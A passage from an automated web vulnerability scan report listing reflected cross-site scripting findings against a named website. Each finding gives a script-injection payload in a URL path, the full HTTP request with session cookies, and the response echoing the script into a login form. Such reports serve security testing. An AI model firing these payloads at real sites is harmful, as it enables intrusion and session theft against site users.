Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-9acad7d7cf6c6aff11173026556b6bf9"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets546d8"><script>alert(1)</script>1957a09d746/js/learn_more.js" method="post">
...[SNIP]...

1.36. http://www.watchmouse.com/assets/js/learn_more.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/learn_more.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c169e"><script>alert(1)</script>f515e35e551 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/jsc169e"><script>alert(1)</script>f515e35e551/learn_more.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/learn_more.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:53 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-e0c6ecfe66186619814677f21436921e"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/jsc169e"><script>alert(1)</script>f515e35e551/learn_more.js" method="post">
...[SNIP]...

1.37. http://www.watchmouse.com/assets/js/learn_more.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/learn_more.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbedf"><script>alert(1)</script>c948edd7dca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/learn_more.jsdbedf"><script>alert(1)</script>c948edd7dca HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/learn_more.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:03 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-f3d58c2b8266d5d2655afc1aaeedd0e5"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/learn_more.jsdbedf"><script>alert(1)</script>c948edd7dca" method="post">
...[SNIP]...

1.38. http://www.watchmouse.com/assets/js/ui/ui.core.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/ui/ui.core.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56fcb"><script>alert(1)</script>510d1ce03e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets56fcb"><script>alert(1)</script>510d1ce03e8/js/ui/ui.core.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:49 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-ce06e2405edc79e50fdf753f288b2ae7"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets56fcb"><script>alert(1)</script>510d1ce03e8/js/ui/ui.core.js" method="post">
...[SNIP]...

1.39. http://www.watchmouse.com/assets/js/ui/ui.core.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/ui/ui.core.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcb9d"><script>alert(1)</script>17bf27560ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/jsfcb9d"><script>alert(1)</script>17bf27560ac/ui/ui.core.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:58 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-6d3a1bcd8795ec9d89abcfc49c7b3e7a"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/jsfcb9d"><script>alert(1)</script>17bf27560ac/ui/ui.core.js" method="post">
...[SNIP]...

1.40. http://www.watchmouse.com/assets/js/ui/ui.core.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/ui/ui.core.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ef56"><script>alert(1)</script>551c8dbd435 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/ui4ef56"><script>alert(1)</script>551c8dbd435/ui.core.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-e7d9e587f88ccbe7dba0f5cfdc66e3f7"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/ui4ef56"><script>alert(1)</script>551c8dbd435/ui.core.js" method="post">
...[SNIP]...

1.41. http://www.watchmouse.com/assets/js/ui/ui.core.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/ui/ui.core.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 696b8"><script>alert(1)</script>aaa3a7ee68 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/ui/ui.core.js696b8"><script>alert(1)</script>aaa3a7ee68 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:27 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-1f1a739655918ad669f911b89774a63b"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/ui/ui.core.js696b8"><script>alert(1)</script>aaa3a7ee68" method="post">
...[SNIP]...

1.42. http://www.watchmouse.com/assets/js/ui/ui.dialog.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/ui/ui.dialog.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7391b"><script>alert(1)</script>3f75f90d2e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets7391b"><script>alert(1)</script>3f75f90d2e1/js/ui/ui.dialog.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:43 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-a4d9dd4d4e4aa290ffb12873588047fa"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets7391b"><script>alert(1)</script>3f75f90d2e1/js/ui/ui.dialog.js" method="post">
...[SNIP]...

1.43. http://www.watchmouse.com/assets/js/ui/ui.dialog.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/ui/ui.dialog.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcc72"><script>alert(1)</script>39488c56b3e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/jsfcc72"><script>alert(1)</script>39488c56b3e/ui/ui.dialog.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:56 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-a35a829315c5d70c01dacb3cc4ab4c9a"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/jsfcc72"><script>alert(1)</script>39488c56b3e/ui/ui.dialog.js" method="post">
...[SNIP]...

1.44. http://www.watchmouse.com/assets/js/ui/ui.dialog.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/ui/ui.dialog.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82ce8"><script>alert(1)</script>0413cee298f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/ui82ce8"><script>alert(1)</script>0413cee298f/ui.dialog.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:11 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-54194b6bbf105148acf4bb214716d334"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/ui82ce8"><script>alert(1)</script>0413cee298f/ui.dialog.js" method="post">
...[SNIP]...

1.45. http://www.watchmouse.com/assets/js/ui/ui.dialog.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/ui/ui.dialog.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15c85"><script>alert(1)</script>c06a7faf2bf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/ui/ui.dialog.js15c85"><script>alert(1)</script>c06a7faf2bf HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-73d6f4d052308738a0bfef16978a4f43"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/ui/ui.dialog.js15c85"><script>alert(1)</script>c06a7faf2bf" method="post">
...[SNIP]...

1.46. http://www.watchmouse.com/assets/js/ui/ui.draggable.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/ui/ui.draggable.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91e41"><script>alert(1)</script>844a2f28eff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets91e41"><script>alert(1)</script>844a2f28eff/js/ui/ui.draggable.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:48 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-ffd55a331fbec171dad0d6a3256aee0f"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets91e41"><script>alert(1)</script>844a2f28eff/js/ui/ui.draggable.js" method="post">
...[SNIP]...

1.47. http://www.watchmouse.com/assets/js/ui/ui.draggable.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/js/ui/ui.draggable.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1fd5"><script>alert(1)</script>f3be7babcd4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/jsf1fd5"><script>alert(1)</script>f3be7babcd4/ui/ui.draggable.js HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
